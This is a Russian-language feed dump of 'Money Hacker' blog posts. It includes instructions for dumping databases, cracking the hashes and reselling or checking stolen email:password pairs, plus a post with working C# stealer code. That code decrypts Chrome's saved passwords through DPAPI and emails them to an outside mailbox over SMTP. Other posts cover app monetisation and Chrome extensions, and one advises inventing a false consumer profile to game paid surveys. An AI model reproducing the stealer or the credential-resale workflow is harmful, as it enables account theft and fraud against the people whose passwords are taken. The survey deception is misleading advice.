  &lt;p&gt;Ставим галочки на колонках которые нам нужны и жмем &amp;quot;Get Data&amp;quot; после слития базы экспортируем в документ.&lt;/p&gt;
  &lt;p&gt;И так мы слили базу но чаще всего она в зашифрованном виде, чтобы что то получить с неё её нужно расшифровать.&lt;/p&gt;
  &lt;p&gt;По расшифровке написано довольно много статей гуглите.&lt;/p&gt;
  &lt;p&gt;Допустим мы получили email:password, что делать дальше? Желательно прогнать базу антипабликом и сохранить приват. Дальше есть много способов получения профита с этого:&lt;/p&gt;
  &lt;ol&gt;
    &lt;li&gt;Найти скупщиков баз.&lt;/li&gt;
    &lt;li&gt;Набираете у людей запросы которые им нужны и чекаете на валид, в случае успеха продаем запросы.&lt;/li&gt;
    &lt;li&gt;Чекаем на невалид запросы (origin, uplay и т. д.) и продаем аккаунты скупщикам или знакомым.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p&gt;С первым пунктом все понятно.&lt;/p&gt;
  &lt;p&gt;Второй пункт тоже набираете прокси, берете кряк AIO или Amfi и идете чекать(забугор не обязательно чекать с прокси но лучше с ними).&lt;/p&gt;
  &lt;h2&gt;*********************************************************&lt;/h2&gt;
  &lt;h2&gt;&lt;a href=&quot;https://t.me/money_hacker&quot; target=&quot;_blank&quot;&gt;Money Hacker&lt;/a&gt; - ПОДПИШИСЬ!&lt;/h2&gt;

</content></entry><entry><id>money_hacker:B1XI6_awm</id><link rel="alternate" type="text/html" href="https://teletype.in/@money_hacker/B1XI6_awm?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=money_hacker"></link><title>Воруем пароли из Google Chrome</title><published>2018-09-05T15:59:07.440Z</published><updated>2018-09-05T15:59:07.440Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/01/019aa5a6-18cf-4d98-a2b8-1f0638e6f8b4.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/d0/d0f9a615-efc2-4845-b688-c8dc6228693c.png&quot;&gt;Задача: Написать свой стиллер, который будет расшифровывать пароли GoogleChrome и отсылать на почту.</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/d0/d0f9a615-efc2-4845-b688-c8dc6228693c.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Задача: Написать свой стиллер, который будет расшифровывать пароли GoogleChrome и отсылать на почту.&lt;/p&gt;
  &lt;p&gt;Для начала поговорим о DPAPI(Data Protection Application Programming Interface) – Майкрософт, как и многие компании столкнулась с проблемой шифрования данных, которые могут быть расшифрованы только на стороне клиента. В итоге был создан алгоритм на основе мастер – ключа.&lt;/p&gt;
  &lt;p&gt;Мастер – ключ - это комбинация следующих элементов:&lt;/p&gt;
  &lt;p&gt;SID — уникальный идентификатор безопасности.&lt;/p&gt;
  &lt;p&gt;HMAC (сокращение от англ. hash-based message authentication code, хеш-код идентификации сообщений).&lt;/p&gt;
  &lt;p&gt;PBKDF2 – Password-Based Key Derivation Function. Стандарт формирования ключа на основе пароля. Использует псевдослучайную функцию для получения ключей.&lt;/p&gt;
  &lt;p&gt;MasterKey BLOB — это как раз данные с зашифрованным ключом.&lt;/p&gt;
  &lt;p&gt;Подробнее почитать тут https://habrahabr.ru/post/148602/&lt;/p&gt;
  &lt;p&gt;Отсюда следует главный вывод, что расшифровать пароли хрома можно только там где они были созданы.&lt;/p&gt;
  &lt;p&gt;Давайте напишем такой стиллер.&lt;/p&gt;
  &lt;p&gt;Установим SQLLITE уже известным нам менеджером установки пакетов и добавим следующий код:&lt;/p&gt;
  &lt;p&gt;string fileDb = @&amp;quot;C:/Users/Adminka/AppData/Local/Google/Chrome/User Data/Default/Login Data&amp;quot;; // Путь к логин данным&lt;/p&gt;
  &lt;p&gt;string connectionString = $&amp;quot;Data Source = {fileDb}&amp;quot;;&lt;/p&gt;
  &lt;p&gt;string fileName = @&amp;quot;C:/Temp/output.txt&amp;quot;; // Выходной файл с паролями&lt;/p&gt;
  &lt;p&gt;StreamWriter sw = new StreamWriter(fileName, false, Encoding.UTF8);&lt;/p&gt;
  &lt;p&gt;string dbWay = &amp;quot;Login Data&amp;quot;;&lt;/p&gt;
  &lt;p&gt;string db_fields = &amp;quot;logins&amp;quot;; // база паролей SQLITE&lt;/p&gt;
  &lt;p&gt;byte[] entropy = null;&lt;/p&gt;
  &lt;p&gt;string description;&lt;/p&gt;
  &lt;p&gt;DataTable db = new DataTable();&lt;/p&gt;
  &lt;p&gt;string sql = $&amp;quot;SELECT * FROM {db_fields}&amp;quot;;&lt;/p&gt;
  &lt;p&gt;using (SQLiteConnection connection = new SQLiteConnection(connectionString))&lt;/p&gt;
  &lt;p&gt;{&lt;/p&gt;
  &lt;p&gt;SQLiteCommand command = new SQLiteCommand(sql, connection);&lt;/p&gt;
  &lt;p&gt;SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);&lt;/p&gt;
  &lt;p&gt;adapter.Fill(db);&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;int rows = db.Rows.Count;&lt;/p&gt;
  &lt;p&gt;Console.WriteLine($&amp;quot;Всего записей: {rows}&amp;quot;);&lt;/p&gt;
  &lt;p&gt;for (int i = 0; i &amp;lt; rows; i++)&lt;/p&gt;
  &lt;p&gt;{&lt;/p&gt;
  &lt;p&gt;string url = db.Rows[1].ToString();&lt;/p&gt;
  &lt;p&gt;string login = db.Rows[3].ToString();&lt;/p&gt;
  &lt;p&gt;byte[] byteArray = (byte[])db.Rows[5];&lt;/p&gt;
  &lt;p&gt;byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);&lt;/p&gt;
  &lt;p&gt;string password = new UTF8Encoding(true).GetString(decrypted);&lt;/p&gt;
  &lt;p&gt;sw.WriteLine(&amp;quot;----------------------------&amp;quot;);&lt;/p&gt;
  &lt;p&gt;sw.WriteLine($&amp;quot;Номер: {i}&amp;quot;);&lt;/p&gt;
  &lt;p&gt;sw.WriteLine($&amp;quot;Сайт: {url}&amp;quot;);&lt;/p&gt;
  &lt;p&gt;sw.WriteLine($&amp;quot;Логин: {login}&amp;quot;);&lt;/p&gt;
  &lt;p&gt;sw.WriteLine($&amp;quot;Пароль: {password}&amp;quot;);&lt;/p&gt;
  &lt;p&gt;}&lt;/p&gt;
  &lt;p&gt;sw.Close();&lt;/p&gt;
  &lt;p&gt;MailSend.SendMail(&amp;quot;smtp.mail.ru&amp;quot;, &amp;quot;YourEmail@mail.ru&amp;quot;, &amp;quot;password&amp;quot;, &amp;quot;YandexMail3@ya.ru&amp;quot;, &amp;quot;Пароли&amp;quot;, fileName, fileName);&lt;/p&gt;
  &lt;p&gt;Console.ReadKey();&lt;/p&gt;
  &lt;p&gt;Код класса DPAPI Взят отсюда http://www.obviex.com/samples/dpapi.aspx&lt;/p&gt;
  &lt;h2&gt;*********************************************************&lt;/h2&gt;
  &lt;h2&gt;&lt;a href=&quot;https://t.me/money_hacker&quot; target=&quot;_blank&quot;&gt;Money Hacker&lt;/a&gt; - ПОДПИШИСЬ!&lt;/h2&gt;

</content></entry><entry><id>money_hacker:B1QwZp5vQ</id><link rel="alternate" type="text/html" href="https://teletype.in/@money_hacker/B1QwZp5vQ?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=money_hacker"></link><title>Как создать свое первое мобильное приложение</title><published>2018-09-03T14:12:42.588Z</published><updated>2018-09-03T14:12:42.588Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/f6/f674da16-2fdf-427d-a8bd-87db66a5f8cf.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/a3/a3aa1770-1527-4751-a6fe-fa825df72f8c.png&quot;&gt;Работа над созданием приложения начинается с идеи. Для начала подумайте для кого вы хотите сделать приложение. Например, если вы живете в большом городе, где много туристов, то можно подумать о создании приложения для них. Вариантов очень много.</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/a3/a3aa1770-1527-4751-a6fe-fa825df72f8c.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;Идея&lt;/h3&gt;
  &lt;p&gt;Работа над созданием приложения начинается с идеи. Для начала подумайте для кого вы хотите сделать приложение. Например, если вы живете в большом городе, где много туристов, то можно подумать о создании приложения для них. Вариантов очень много.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://i1.wp.com/zarabotaydengi.com/wp-content/uploads/2018/08/kak-sozdat-prilozhenie.jpg?resize=800%2C490&amp;ssl=1&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Кроме того, подумайте о своих увлечениях и интересах. Допустим, вы часто путешествуете и хотите посетить самые знаменитые клубы по всему миру. Вы составили список ваших любимых мест. Почему бы не превратить эту базу данных в приложение для путешественников?&lt;/p&gt;
  &lt;p&gt;Много известных приложений не сосредоточены вокруг особых интересов, но они всегда в первых тройках рейтингов – это игры. Вы, наверное, уже загрузили в свой смартфон – Temple Run, Minecraft. Игровые приложения имеют тенденцию зарабатывать больше денег, поскольку пользователи охотнее готовы платить за них, особенно если они очень популярны среди ваших друзей.&lt;/p&gt;
  &lt;p&gt;Не отчаивайтесь, если вы найдете что-то похожее на вашу идею при поиске через App Store. Научитесь мыслить нестандартно. Например, есть несколько приложений, которые предоставляют информацию и карты обо всех самых популярных туристических местах в Москве. Но есть приложение, которое предоставляет информацию о необычных местах города, о которых не все знают.&lt;/p&gt;
  &lt;p&gt;Попробуйте придумать идею, у которой будет мало конкурентов. Но если вы решительно настроены в воплощении вашей идеи в приложение, несмотря на конкуренцию, взгляните на ваших конкурентов и попытайтесь выяснить, что вы можете сделать, чтобы ваше приложение было лучше их.&lt;/p&gt;
  &lt;p&gt;Вот некоторые важные моменты, которые необходимо учитывать пока вы размышляете над вашим приложением:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Планируете ли вы разрабатывать приложение самостоятельно, или вы в состоянии нанять команду программистов?&lt;/li&gt;
    &lt;li&gt;Чем приложение будет полезно людям&lt;/li&gt;
    &lt;li&gt;Потребует ли приложение ежедневного контроля&lt;/li&gt;
    &lt;li&gt;Вы хотите, чтобы ваше приложение стало вашим основным бизнесом или просто одиночным проектом&lt;/li&gt;
    &lt;li&gt;На каких платформах будет работать ваше приложение&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3&gt;Типы приложений&lt;/h3&gt;
  &lt;p&gt;Есть очень много категорий, в которых можно создать приложение. Вот список с примерами некоторых наиболее популярных вариантов.&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Игры (Angry Birds)&lt;/li&gt;
    &lt;li&gt;Путешествия (TripAdvisor, Kayak)&lt;/li&gt;
    &lt;li&gt;Социальные сети (Facebook, Twitter)&lt;/li&gt;
    &lt;li&gt;Новости (РИА Новости, НТВ: новости )&lt;/li&gt;
    &lt;li&gt;Музыка (Spotify, Pandora)&lt;/li&gt;
    &lt;li&gt;Видео (Vine)&lt;/li&gt;
    &lt;li&gt;Утилиты (Google Переводчик, фонарик)&lt;/li&gt;
    &lt;li&gt;Фото (Instagram, Picstitch)&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3&gt;Варианты монетизации&lt;/h3&gt;
  &lt;p&gt;Перед началом разработки приложения вам нужно определиться, как вы будите на нем зарабатывать. Существует несколько основных способов монетизации приложений:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Бесплатное приложение. Обычно используется крупными компаниями, и приложение помогает продавать их товары или услуги.&lt;/li&gt;
    &lt;li&gt;Бесплатное приложение с рекламой. Используется в популярных приложениях, активно взаимодействующих с пользователем&lt;/li&gt;
    &lt;li&gt;Платное приложение. Самый популярный и доходный вид монетизации. С каждой продажи вашего приложения Apple берет комиссию в размере 30%.&lt;/li&gt;
    &lt;li&gt;Lite и Pro. Lite приложение бесплатно, но с ограниченным набором функций. Покупая Pro вы разблокируете весь функционал&lt;/li&gt;
    &lt;li&gt;Покупки внутри приложения — вы можете продавать новый функционал или новые уровни игры прямо из приложения&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3&gt;Разработка&lt;/h3&gt;
  &lt;p&gt;Теперь у вас есть идея. Здорово, это уже полдела! Но что теперь? Мы предполагаем, что у вас, как и большинства людей, нет никакого опыта в программировании. И это прекрасно! Есть куча вариантов.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://i1.wp.com/zarabotaydengi.com/wp-content/uploads/2014/02/9070772122_39c7107b7b_o-500x375.jpg?resize=500%2C375&quot; width=&quot;500&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Если вы хотите пойти по легкому, но более дорогому пути, то загляните на сайты разработчиков мобильных приложений. Сайт AppBooker позволяет ввести нужную платформу, страну, ваш бюджет и затем он выдаст список разработчиков, которые отвечают вашим потребностям. Выбрав разработчика, вы можете увидеть список его клиентов и типы приложений, на которых они специализируются.&lt;/p&gt;
  &lt;p&gt;Хороший список отечественных разработчиков можно посмотреть здесь – ratingruneta.&lt;/p&gt;
  &lt;p&gt;Еще один вариант найти разработчика это обратиться на биржи флинасеров. Возможно, это даже будет дешевле, но более рискованно, так как вам может попасться недобросовестный работник.&lt;/p&gt;
  &lt;p&gt;Вот несколько вопросов, которые стоит задать вашему будущему разработчику:&lt;/p&gt;
  &lt;p&gt;Стоимость их работы?&lt;/p&gt;
  &lt;p&gt;На кого они работали в прошлом?&lt;/p&gt;
  &lt;p&gt;Являются ли их приложения успешными?&lt;/p&gt;
  &lt;p&gt;Буду ли я обладать всеми правами на приложение?&lt;/p&gt;
  &lt;p&gt;Есть ли у них опыт и знания, чтобы воплотить вашу идею в жизнь?&lt;/p&gt;
  &lt;p&gt;Под какие платформы (IOS, Android и т.д.), они могут создавать приложения?&lt;/p&gt;
  &lt;h3&gt;Стоимость разработки&lt;/h3&gt;
  &lt;p&gt;Как говорится, чтобы заработать деньги надо их сначала потратить. Это не совсем так если говорить о мобильных приложениях, но вернемся к этому ниже. А пока предположим, что вы решили заказать приложение у разработчика.&lt;/p&gt;
  &lt;p&gt;В зависимости от типа приложения, которое вы хотите сделать, цена может варьироваться от $500 до $100000. Такая цена может показаться очень высокой, но стоит иметь в виду, что прибыль от успешного приложения покрывает расходы в несколько раз. Кроме того, игровые приложения самые дорогостоящие в плане разработки, так же являются хитами продаж.&lt;/p&gt;
  &lt;p&gt;Если у вас уже есть некоторые наработки (например, макет и графика), вы можете значительно уменьшить цену. Еще один способ, снизить расход, предложить разработчику часть прибыли от приложения.&lt;/p&gt;
  &lt;p&gt;Чтобы приблизительно узнать, сколько будет стоить разработать приложение можно воспользоваться калькулятором howmuchtomakeanapp. Его создала канадская компания ooomf.com. Полученную цену можно смело делить на 2, и вы узнаете цену разработки у нас. Можно посмотреть также примеры уже созданных ими приложений с ценами – crew.co.&lt;/p&gt;
  &lt;p&gt;Размещение уже готового приложения на App store обойдется вам $99.9 в год. Размещение приложения на Android Market стоит $25.&lt;/p&gt;
  &lt;h3&gt;Как создать приложение бесплатно&lt;/h3&gt;
  &lt;p&gt;Если вы не хотите создать игру или какое-то уникальное по своим функциям приложение, то вы вполне можете воспользоваться специальными онлайн конструкторами мобильных приложений. С помощью этих сайтов вы можете бесплатно сделать простенькое приложение без знаний в программировании. Но если вы захотите чего то особенного, то вам придётся перейти на платный тариф.&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Appsmakerstore.com&lt;/li&gt;
    &lt;li&gt;Infinitemonkeys.mobi&lt;/li&gt;
    &lt;li&gt;ibuildapp.com&lt;/li&gt;
    &lt;li&gt;appsvolcano.com&lt;/li&gt;
    &lt;li&gt;yapp.us&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3&gt;Сколько можно заработать?&lt;/h3&gt;
  &lt;p&gt;Очевидно, что деньги, которые вы заработаете на своем приложении, во многом будет зависеть от его популярности, и сколько вы заработаете трудно сказать.&lt;/p&gt;
  &lt;blockquote&gt;Исследование, проведенное в GigaOM Pro показало, что более половины их 352 опрошенных разработчиков зарабатывают менее $500 в месяц.&lt;/blockquote&gt;
  &lt;p&gt;Этого конечно недостаточно чтобы жить только от доходов с приложения, но прекрасно, если вы просто хотите заработать немного дополнительных денег.&lt;/p&gt;
  &lt;p&gt;Конечно, вы можете сделать еще один хит на подобии Angry Birds, которые будут зарабатывать для вас $100 000 в месяц!&lt;/p&gt;
  &lt;p&gt;Для того чтобы хорошо зарабатывать на своем приложении, прочтите несколько советов:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;ваше приложение должно быть интересно широкой аудитории&lt;/li&gt;
    &lt;li&gt;исследуйте самые популярные приложения на рынке&lt;/li&gt;
    &lt;li&gt;в настоящее время, легче заработать деньги на приложениях для IOS&lt;/li&gt;
    &lt;li&gt;сделайте ваше приложение доступным для Ipad&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h2&gt;*********************************************************&lt;/h2&gt;
  &lt;h2&gt;&lt;a href=&quot;https://t.me/money_hacker&quot; target=&quot;_blank&quot;&gt;Money Hacker&lt;/a&gt; - ПОДПИШИСЬ!&lt;/h2&gt;

</content></entry><entry><id>money_hacker:r1Y5Z1Dv7</id><link rel="alternate" type="text/html" href="https://teletype.in/@money_hacker/r1Y5Z1Dv7?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=money_hacker"></link><title>Немного годноты для Google Chrome</title><published>2018-08-31T15:41:04.548Z</published><updated>2018-08-31T15:41:04.548Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/ae/ae3d0c0a-ab55-4fef-99f2-92e471e6bb6c.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/12/12da48ed-8847-4e78-bd44-037f3bba3583.png&quot;&gt;1. EditThisCookie </summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/12/12da48ed-8847-4e78-bd44-037f3bba3583.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;1. &lt;a href=&quot;http://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?utm_source=chrome-app-launcher-info-dialog&quot; target=&quot;_blank&quot;&gt;EditThisCookie &lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;EditThisCookie - это менеджер cookie. Вы можете добавлять, удалять, изменять, искать, защищать и блокировать cookie, продлить срок и т.д.&lt;/p&gt;
  &lt;p&gt;2. &lt;a href=&quot;http://chrome.google.com/webstore/detail/visual-event/pbmmieigblcbldgdokdjpioljjninaim?utm_source=chrome-app-launcher-info-dialog&quot; target=&quot;_blank&quot;&gt;Visual Event&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Visual Event - удобный парсер JavaScript кода, с приятным интерфейсом. Тоесть для того что-бы узнать какая функция вызывается при нажатии ( onclick ), достаточно включить расширение.&lt;/p&gt;
  &lt;p&gt;3. &lt;a href=&quot;http://chrome.google.com/webstore/detail/web-sniffer/ndfgffclcpdbgghfgkmooklaendohaef?utm_source=chrome-app-launcher-info-dialog&quot; target=&quot;_blank&quot;&gt;Web Sniffer&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Web Sniffer - сниффер запросов. Допустим вам нужно узнать куда отправляются данные при авторизации, и каким методом они передаются.&lt;/p&gt;
  &lt;p&gt;4. &lt;a href=&quot;http://chrome.google.com/webstore/detail/user-agent-switcher/lkmofgnohbedopheiphabfhfjgkhfcgf/related?utm_source=chrome-app-launcher-info-dialog&quot; target=&quot;_blank&quot;&gt;User-Agent Switcher&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;User-Agent Switcher - подделка информации о браузере, при посещении. При посещении любого ресурса, передается такая информация как:&lt;/p&gt;
  &lt;p&gt;-ip&lt;/p&gt;
  &lt;p&gt;-user-agent (расширеная информация о браузере)&lt;/p&gt;
  &lt;p&gt;-включен ли Javascript/webGL&lt;/p&gt;
  &lt;p&gt;-время установленое на компьютере&lt;/p&gt;
  &lt;p&gt;-временая зона&lt;/p&gt;
  &lt;p&gt;и еще много чего...&lt;/p&gt;
  &lt;p&gt;С помощью расширения можно отредактировать информацию о браузере, при посещении ресурса.&lt;/p&gt;
  &lt;p&gt;Проверить свой User-agent можно тут:&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;http://www.whoishostingthis.com/tools/user-agent/&quot; target=&quot;_blank&quot;&gt;www.whoishostingthis.com/tools/user-agent/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;5 - &lt;a href=&quot;http://chrome.google.com/webstore/detail/user-agent-switcher/lkmofgnohbedopheiphabfhfjgkhfcgf/related?utm_source=chrome-app-launcher-info-dialog&quot; target=&quot;_blank&quot;&gt;Toggle JavaScript&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Toggle JavaScript - позваляет мгновенно отключать и включать javascript. Как многим известно js штука не без обидная, она способна отправить запрос от вашего ip адреса, если вы посетите какой-нибудь сайт с вредоносным js скриптом. Расширение позволяет отключить js и просматривать страницы без него. Интерфейс легкий, нажал один раз - отключил js, еще один раз включил. Внешний вид и функционал привычных вам сайтов, может значительно измениться.&lt;/p&gt;
  &lt;h2&gt;*********************************************************&lt;/h2&gt;
  &lt;h2&gt;&lt;a href=&quot;https://t.me/money_hacker&quot; target=&quot;_blank&quot;&gt;Money Hacker&lt;/a&gt; - ПОДПИШИСЬ!&lt;/h2&gt;

</content></entry><entry><id>money_hacker:rJ8b4HND7</id><link rel="alternate" type="text/html" href="https://teletype.in/@money_hacker/rJ8b4HND7?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=money_hacker"></link><title>Прохождение платных опросов. 500р/день.</title><published>2018-08-29T16:04:13.644Z</published><updated>2018-08-29T16:04:13.644Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/c8/c81e508e-469f-4e93-9e0e-dcb34bb61e4e.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/4f/4f448465-d76b-42fa-9c74-9fdb15ea7b8a.png&quot;&gt;Привет друзья, вы наверняка слышали о таких сервисах как платные опросники, но не знаете как ПРАВИЛЬНО на них заработать?</summary><content type="html">
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/4f/4f448465-d76b-42fa-9c74-9fdb15ea7b8a.png&quot; width=&quot;1000&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Привет друзья, вы наверняка слышали о таких сервисах как платные опросники, но не знаете как ПРАВИЛЬНО на них заработать?&lt;/p&gt;
  &lt;p&gt;Эта статья специально для вас!&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;За что Вам будут платить?&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Первый бонус дают за заполнение анкеты.&lt;/p&gt;
  &lt;p&gt;Получайте награду от 15 - 500 рублей за прохождение опроса.&lt;/p&gt;
  &lt;p&gt;Приглашайте друзей и получайте 10% от их дохода.&lt;/p&gt;
  &lt;p&gt;Награды за качественные вопросы.&lt;/p&gt;
  &lt;p&gt;Помогайте людям ответами и получайте вознаграждение.&lt;/p&gt;
  &lt;p&gt;Чем больше опросов проходишь, тем больше получаешь&lt;/p&gt;
  &lt;p&gt;Так что можете смело приступать, еще один отличный вариант заработка в интернете.&lt;/p&gt;
  &lt;p&gt;Вообще, сайтов, позволяющих зарабатывать таким образов в интернете очень много. Если зарегистрироваться на самых популярных, и немного привыкнуть ко всем этим анкетам, то заработок будет довольно неплохой и быстрый, так как после 20-го (10-го или 50-го, тут индивидуально) пройденного опроса, вы уже будете на автомате отвечать на вопросы, так как в большинстве опросов они одинаковые и понять то, о чём вас спрашивают, можно будет прочитав первое и последнее слово вопроса!) Я лишь хочу поделиться с вами списком самых популярных опросников и парочкой советов для новичков (и не только). Поехали:&lt;/p&gt;
  &lt;p&gt;Список &lt;strong&gt;лучших&lt;/strong&gt; опросников:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Myiyo&lt;/li&gt;
    &lt;li&gt;Платный Опрос&lt;/li&gt;
    &lt;li&gt;Экспертное мнение&lt;/li&gt;
    &lt;li&gt;Вопросник&lt;/li&gt;
    &lt;li&gt;Profi Online Research&lt;/li&gt;
    &lt;li&gt;e-opros&lt;/li&gt;
    &lt;li&gt;Анкетка&lt;/li&gt;
    &lt;li&gt;InternetOpros&lt;/li&gt;
    &lt;li&gt;i-Say&lt;/li&gt;
    &lt;li&gt;Anketolog&lt;/li&gt;
    &lt;li&gt;MarketAgent&lt;/li&gt;
    &lt;li&gt;МоеМнение&lt;/li&gt;
    &lt;li&gt;RUBLKLUB&lt;/li&gt;
    &lt;li&gt;ИнтернетАнкетка&lt;/li&gt;
    &lt;li&gt;Точка Зрения&lt;/li&gt;
    &lt;li&gt;АвтоОпрос&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;Так же в интернете можно найти еще десяток сайтов, но платить больше, или даже на одном уровне с теми, что я перечислил выше, они не будут. Та и не факт, что вообще будут платить! Поэтому, будьте осторожны.&lt;/p&gt;
  &lt;p&gt;Теперь перейдем к тем самым &lt;strong&gt;простым,&lt;/strong&gt; но &lt;strong&gt;полезным&lt;/strong&gt; советам:&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;1. &lt;/strong&gt;Очень часто вводная часть опроса содержит один принципиальный вопрос – работаете ли вы или ваши родственники в:&lt;/p&gt;
  &lt;p&gt;• СМИ или PR;&lt;/p&gt;
  &lt;p&gt;• сфере образования;&lt;/p&gt;
  &lt;p&gt;• маркетинге…&lt;/p&gt;
  &lt;p&gt;Даже если и работают, лучше в этом не признаваться. Как правило, представители этих сфер деятельности ни в один платный опрос не входят. Проверять никто не станет, но даже не смотря на это &lt;strong&gt;по ключевым вопросам лучше не врать&lt;/strong&gt;. Если, например, при заполнении профиля вы указали, что замужем и имеете ребенка, не отмечайте во время опроса, что вы неженатый и двадцати лет от роду. Система помнит всё, что вы ей отвечали с первого дня вашего знакомства. Поэтому, если вы будете заподозрены в нечестности, запросто можете быть вычеркнуты из кандидатов на следующий платный опрос в интернете или вообще забанены.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;​2.&lt;/strong&gt; Но есть и вещи, которые можно немного приукрасить. Например, стать немного:&lt;/p&gt;
  &lt;p&gt;• платежеспособней (собираетесь покупать?.. — Конечно! Может, даже два!)&lt;/p&gt;
  &lt;p&gt;• самостоятельней (все решения принимаю сам! Нет, с женой не советуюсь!)&lt;/p&gt;
  &lt;p&gt;• ненасытней (подумаешь, есть два смартфона, утюга, телевизора, холодильника...Третий ведь такой няшный!.. Куплю и в самое ближайшее время!). Не бойтесь, чек для подтверждения прислать не потребуют&lt;strong&gt;.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;3. &lt;/strong&gt;Не ждите опросы на почте! Иногда, оповещение запаздывают, а о некоторых опросах и вообще не приходят. Есть возможность зайти на опросники? Заходите, проверяйте — это вам же на пользу!&lt;/p&gt;
  &lt;p&gt;Не поленитесь зарегистрироваться везде, хоть это долго и нудно. Ведь это в дальнейшем может приносить вам &lt;strong&gt;довольно неплохой ежедневный доход&lt;/strong&gt;!&lt;/p&gt;
  &lt;p&gt;Лайфхак&lt;/p&gt;
  &lt;p&gt;&lt;em&gt;Заработок от 500 рублей в день и более.&lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;Постараюсь коротко и максимально понятно:&lt;/p&gt;
  &lt;p&gt;Идеально подходит,если ты просиживаешь штаны дома и ничего не делаешь, подходит для новичков.&lt;/p&gt;
  &lt;p&gt;Будем наживаться на сайтах которые проводят опросы, сейчас подумаешь что они платят копейки и т.д. Но нет дружище, тут главное правильно все сделать, в начале придется набраться терпения и потрудиться.&lt;/p&gt;
  &lt;p&gt;Ищите все возможные сайты опросники(вышеназвания сайтов написал. уже считай нашли)&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Дальше сам процесс регистрации, тут читай внимательно. Нам нужно создать образ человека который потребляет максимально кол-во товаров любого вида, как это делается.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Вам должно быть порядка 30 - 45 лет, у вас 2-3 ребенка, жена, хорошая работа, живёте вы в БОЛЬШОМ ГОРОДЕ - Москва (Это очень важно). У вас несколько машин, хороший дом, дети разной возрастной категории ( 2 года, 7 лет, 15 лет - лучший вариант ), работа не пыльная - ТОЛЬКО НЕ МАРКЕТИНГ, что угодно (У меня прокатывала Медицина), машины не дешевые (500000 - 1500000 рублей) такая же и вторая. У вас все возможны технологии (Телефоны, компьютеры, и вся-вся эта хрень) Вы главный в семье и решаете все финансовые потребности.&lt;/p&gt;
  &lt;p&gt;И так это САМОЕ ГЛАВНОЕ. &lt;strong&gt;Делайте так что бы быть максимально потребляющим человеком.&lt;/strong&gt; Все данные которые пишите при регистрации или запоминайте или сохраняйте (Сохранять лучше), Имя Фамилия Отчество адекватные, можно свои, можно выдумать, ничего там не проверяется. Почта должна быть gmail, так как на другие почты опросы часто не приходят.&lt;/p&gt;
  &lt;p&gt;Всё это проделываем везде, рука набьется и за день везде можно зарегаться.&lt;/p&gt;
  &lt;p&gt;С такими данными за один опрос будут платить порядка 30-100 рублей, зависит от вашей активности, то есть уже не 5 копеек, а 100 рублей. Через неделю полной активности ждите тучу этих опросов с разных сайтов. Я максимально поднимал при хиленькой вечерней активности, по 4-5 опросов за вечер порядка 20-30 тыс. в месяц.&lt;/p&gt;
  &lt;p&gt;Удачи и пока!&lt;/p&gt;
  &lt;h2&gt;*********************************************************&lt;/h2&gt;
